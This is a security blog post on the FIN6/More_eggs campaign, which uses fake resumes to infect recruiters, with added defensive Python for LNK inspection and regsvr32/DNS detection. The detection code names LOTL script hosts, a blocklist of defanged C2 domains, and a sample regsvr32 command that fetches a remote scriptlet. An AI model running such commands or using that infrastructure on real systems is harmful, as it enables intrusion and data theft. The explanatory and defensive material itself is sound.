
Hackers Target Recruiters with Fake Job Applications


Hackers use fake job applications to target recruiters. The cybercriminal gang FIN6 is using a clever new method to infiltrate HR departments: posing as job seekers and tricking recruiters into downloading harmful files. The malware involved, known as More_eggs, is an emerging cybersecurity threat in recruitment.

The Increase of Fake Job Application Attacks

The increased use of bogus job applications by fraudsters poses a severe and evolving threat to business recruitment operations. The hacking group FIN6 has been linked to campaigns in which malicious actors pose as job seekers on platforms like LinkedIn and Indeed, circumventing typical email filters and leading recruiters into compromising exchanges (Nair, 2025).

Attackers send non-clickable resume URLs hosted on reputable cloud providers like Amazon Web Services (AWS) to avoid detection. Once typed in manually, the URLs lead to malware-laden landing sites meant to infect the recruiter's device with backdoors like More_eggs, which can execute remote commands, steal credentials, and deploy further malware (Maurer, 2025).


How the Attack Works


1. Impersonation and Social Engineering

  • Fake LinkedIn Profiles: Hackers create polished, convincing profiles with connections, endorsements, and job history.

  • Spoofed Company Domains: They imitate or slightly alter legitimate corporate domains (e.g., using “.co” instead of “.com”) to appear authentic.

  • Tailored Messaging: Personalized messages referencing real job openings or company activity to build trust.


2. Malicious Resume Delivery

  • Malware-Embedded Files: Submitted resumes may contain:

    • .LNK files triggering downloads

    • Macro-enabled Word or Excel docs

    • Malicious PDFs or ZIP files

  • Cloud-Hosted Payloads: Hosted on AWS, Dropbox, or Google Drive to avoid security filters. Recruiters are often asked to manually enter the URL.

  • CAPTCHA Obfuscation: Malware delivery sites may use CAPTCHA walls to evade automated scanning tools (Lyons, 2025).


3. Credential Harvesting & Business Email Compromise

  • Fake Portfolios or Assessment Platforms: Direct recruiters to phishing pages to steal credentials.

  • Follow-up Scams: Attackers may impersonate internal staff to extract sensitive information or request wire transfers.

4. Post-Infection Actions

  • Data Exfiltration: Harvesting login credentials, applicant PII, HR files, or company IP.

  • Remote Access: Use of Remote Access Trojans (RATs) to move laterally in networks.

  • Ransomware Deployment: Malware often acts as a precursor to ransomware attacks.

  • Brand Impersonation: Compromised company identities may be used to launch further scams.


Why Recruiters Are Prime Targets


  • Access to Sensitive Data: HR departments handle applicant resumes, background checks, and payroll data.

  • High Email Volume: Recruiters regularly open files from unfamiliar sources, increasing risk.

  • Routine Behavior: Reviewing portfolios and attachments is part of daily operations, making malicious activity harder to detect.

Defensive Measures: How to Protect Your Recruitment Process

Secure Attachments and Email Systems

  • Scan all attachments using sandbox tools (e.g., VirusTotal, Sandboxie).

  • Disable Office macros by default.

  • Use strong email protection (SPF, DKIM, DMARC) and advanced threat protection (ATP).

Verify Identity

  • Cross-reference candidates’ email domains, LinkedIn profiles, and resumes.

  • Manually type known URLs instead of clicking on emailed links.

  • Treat “too perfect” candidates or high-pressure communications with skepticism.

Harden Your Applicant Tracking System (ATS)

  • Regularly patch and update ATS software.

  • Sanitize file uploads and scan all content server-side.

  • Monitor for anomalies like repeated failed logins or strange file formats.

Employee Cybersecurity Training

  • Conduct quarterly security awareness programs for recruiters.

  • Simulate phishing attempts using fake malicious applications.

  • Encourage a “trust but verify” mindset across HR departments.

Use Endpoint and Network Protection

  • Deploy Endpoint Detection & Response (EDR) tools (e.g., CrowdStrike, SentinelOne).

  • Implement zero trust principles and least privilege access for HR systems.

  • Use application whitelisting to prevent unauthorized software execution.

Real-World Examples

  • Emotet & QakBot Campaigns (2020–2023): Malware was distributed via fake resumes to HR inboxes.

  • QakBot (2023): Specifically targeted recruitment teams with macro-enabled attachments.

  • LinkedIn Phishing Schemes: Impersonated recruiters to steal user credentials and launch lateral phishing campaigns.


Technical Breakdown of the More_eggs Attack Chain


Venom Spider’s Pivot: Targeting HR Departments

What Changed:

  • Venom Spider (aka TA4557) previously focused on e-commerce. Now it's exploiting HR's universal trust vector—reviewing job applications.

  • They distribute fake resumes via legitimate channels (e.g., LinkedIn, Indeed messaging), which adds credibility.


Why It Works:

  • HR teams are accustomed to opening resumes from strangers.

  • They often lack the same security training or tools as IT teams, making them vulnerable.


More_eggs Malware: Technical Breakdown

Attack Flow:

  1. Spear-phishing email or job application → links to resume site.

  2. CAPTCHA challenge to evade automation → downloads ZIP file.

  3. ZIP contains:

    • A decoy image.

    • A malicious .LNK file (Windows shortcut) with embedded obfuscated batch script.

  4. Batch script abuses built-in Windows utilities (living off the land, LOTL), such as ie4uinit.exe, for covert execution.

  5. Downloads obfuscated JavaScript → runs the More_eggs DLL dropper via regsvr32.

  6. DLL creates polymorphic JavaScript payloads to avoid sandboxing.

  7. Final payload:

    • Uses device-specific encryption (host-locked).

    • Establishes persistent C2 channels (e.g., tool[.]municipiodechepo[.]org).

    • Enables remote access, data exfiltration, and malware delivery.


Why This Campaign Is Especially Dangerous

  • Highly evasive: Uses LOTL tactics, polymorphic code, and time-delayed execution.

  • Hard to trace: Uses decentralized hosting (Amazon, GoDaddy).

  • Custom per-target: Payloads are encrypted with host-specific keys, complicating reverse engineering.

  • Universal entry vector: Every company hires people—HR is now a vulnerable surface.


How to Defend Against It

Technical Controls

  • Secure Email Gateways (SEGs): Filter phishing attempts.

  • Endpoint Detection & Response (EDR): Detect abnormal file behavior and lateral movement.

  • DNS and URL Filtering: Block known malicious domains and detect anomalous outbound requests.

  • File Inspection: Flag .LNK files and other uncommon attachment types sent via job platforms.

Training & Awareness

  • HR-specific phishing training: Include examples of job applicant-themed lures.

  • Teach red flags: ZIP files, CAPTCHAs on resume sites, unexpected shortcut files.

Behavioral Defense

  • Require verification of suspicious files’ metadata (e.g., .LNK pointing to cmd.exe).

  • Use sandboxing for attachments before opening, especially in hiring workflows.
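The .LNK metadata check recommended above, and the shortcut-inside-a-ZIP stage of the attack flow (step 3), as an added example that is not part of the original post or any vendor's tooling: a small Python inspector that reads a shortcut's StringData fields per Microsoft's MS-SHLLINK format and flags targets such as cmd.exe or ie4uinit.exe, so the file can be triaged without ever being opened. The function names, `SUSPECT_HOSTS` and the fixture shortcut built by `build_lnk` are this example's own constructions.

```python
import struct

# Shell Link (.LNK) header constants from Microsoft's MS-SHLLINK specification.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
FLAG_ID_LIST, FLAG_LINK_INFO, FLAG_UNICODE = 0x01, 0x02, 0x80
STRING_FIELDS = [(0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                 (0x20, "arguments"), (0x40, "icon_location")]
# Programs a "resume" shortcut has no business launching (cmd.exe and ie4uinit.exe per the post).
SUSPECT_HOSTS = ("cmd.exe", "powershell", "wscript", "cscript", "mshta",
                 "regsvr32", "rundll32", "ie4uinit")

def parse_lnk(data: bytes) -> dict:
    """Validate the header, skip the ID-list and LinkInfo blocks, return the StringData fields."""
    if len(data) < 76 or struct.unpack_from("<I", data)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = 76
    if flags & FLAG_ID_LIST:                       # IDListSize (2 bytes) followed by the items
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & FLAG_LINK_INFO:                     # LinkInfoSize includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    unicode = bool(flags & FLAG_UNICODE)
    fields = {}
    for bit, name in STRING_FIELDS:                # each: CountCharacters (2 bytes) + chars, no terminator
        if flags & bit:
            nbytes = struct.unpack_from("<H", data, pos)[0] * (2 if unicode else 1)
            fields[name] = data[pos + 2:pos + 2 + nbytes].decode("utf-16-le" if unicode else "latin-1")
            pos += 2 + nbytes
    return fields

def assess_lnk(fields: dict) -> list:
    """Metadata checks to run on a shortcut before anyone double-clicks it."""
    target = (fields.get("relative_path", "") + " " + fields.get("arguments", "")).lower()
    findings = [f"target invokes {h}" for h in SUSPECT_HOSTS if h in target]
    if len(fields.get("arguments", "")) > 200:
        findings.append("unusually long arguments (embedded script likely)")
    return findings

def build_lnk(relative_path: str, arguments: str) -> bytes:
    """Constructed test fixture: minimal header plus two Unicode strings, no ID list or LinkInfo."""
    header = struct.pack("<I16sI", 0x4C, LNK_CLSID, 0x08 | 0x20 | FLAG_UNICODE) + bytes(52)
    strings = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                       for s in (relative_path, arguments))
    return header + strings
```

Real shortcuts usually carry an ID list and LinkInfo block as well; the parser skips both using their own length fields, so it handles those too.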

Block Threat Infrastructure

  • Proactively block:

    • doefstf[.]ryanberardi[.]com

    • tool[.]municipiodechepo[.]org

  • Monitor for signs of regsvr32 misuse and suspicious outbound DNS activity.
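An added example (not the post's or any vendor's code) of the regsvr32 and DNS monitoring just recommended: two small rules run over constructed Sysmon-style events, with the two defanged domains above as the blocklist. The event field names (`Image`, `ParentImage`, `CommandLine`, `QueryName`), the host names and the `example.invalid` URL are assumptions made for this example.

```python
import json
import re
# C2 hosts named in the post, kept defanged here and normalised only inside the matcher.
BLOCKED_HOSTS = {h.replace("[.]", ".") for h in
                 ("doefstf[.]ryanberardi[.]com", "tool[.]municipiodechepo[.]org")}
# LOTL/script hosts that should never be the parent of regsvr32 in a recruiter's session.
SCRIPT_PARENTS = {"cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe", "ie4uinit.exe"}
REMOTE_SCRIPTLET = re.compile(r"/i:\s*https?://", re.IGNORECASE)
USER_WRITABLE = re.compile(r"\\(appdata|temp|downloads)\\", re.IGNORECASE)

def basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]

def check_process(ev: dict) -> list:
    """Flag regsvr32 loading a remote scriptlet, spawned by a script host, or run from user space."""
    if basename(ev.get("Image", "")) != "regsvr32.exe":
        return []
    cmd, parent, findings = ev.get("CommandLine", ""), basename(ev.get("ParentImage", "")), []
    if REMOTE_SCRIPTLET.search(cmd):
        findings.append("regsvr32 /i: with remote URL")
    if parent in SCRIPT_PARENTS:
        findings.append(f"regsvr32 spawned by {parent}")
    if USER_WRITABLE.search(cmd):
        findings.append("DLL path under a user-writable directory")
    return findings

def check_dns(ev: dict) -> list:
    name = ev.get("QueryName", "").lower().rstrip(".")
    return [f"DNS query to blocked C2 host {name}"] if name in BLOCKED_HOSTS else []

def triage(ndjson_lines) -> list:
    """Return (host, subject, findings) for each event that trips a rule; clean events are dropped."""
    hits = []
    for line in ndjson_lines:
        ev = json.loads(line)
        found = check_process(ev) if ev["EventType"] == "ProcessCreate" else check_dns(ev)
        if found:
            hits.append((ev["Host"], ev.get("Image") or ev.get("QueryName"), found))
    return hits

# Constructed sample events with Sysmon-style field names (not real telemetry).
SAMPLE_EVENTS = [
    r'{"Host":"hr-laptop-07","EventType":"ProcessCreate","Image":"C:\\Windows\\System32\\regsvr32.exe",'
    r'"ParentImage":"C:\\Windows\\System32\\ie4uinit.exe","CommandLine":'
    r'"regsvr32.exe /s /i:https://example.invalid/r.sct C:\\Users\\hr\\AppData\\Local\\Temp\\r.dll"}',
    r'{"Host":"hr-laptop-07","EventType":"DnsQuery","QueryName":"tool.municipiodechepo.org."}',
    r'{"Host":"it-ws-02","EventType":"ProcessCreate","Image":"C:\\Windows\\System32\\regsvr32.exe",'
    r'"ParentImage":"C:\\Windows\\explorer.exe","CommandLine":"regsvr32.exe /s C:\\Program Files\\Vendor\\v.dll"}',
    r'{"Host":"it-ws-02","EventType":"DnsQuery","QueryName":"updates.example.com"}',
]
```

Running `triage(SAMPLE_EVENTS)` reports only the HR laptop: the legitimate vendor DLL registration and the ordinary DNS lookup on the IT workstation produce no findings.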


Conclusion

Fake job applications are a growing trend in cybercrime-as-a-service (CaaS), where social engineering and technical sophistication combine. Organizations should adopt a multi-layered defense approach to reduce risk and protect sensitive HR operations. Security experts advise recruiters to verify candidates through independent reference checks and to avoid downloading resumes from unknown sources. Amazon, whose AWS infrastructure may have been used, has responded to abuse reports and encourages responsible disclosure.


© 2035 by Train of Thoughts. Powered and secured by Thiru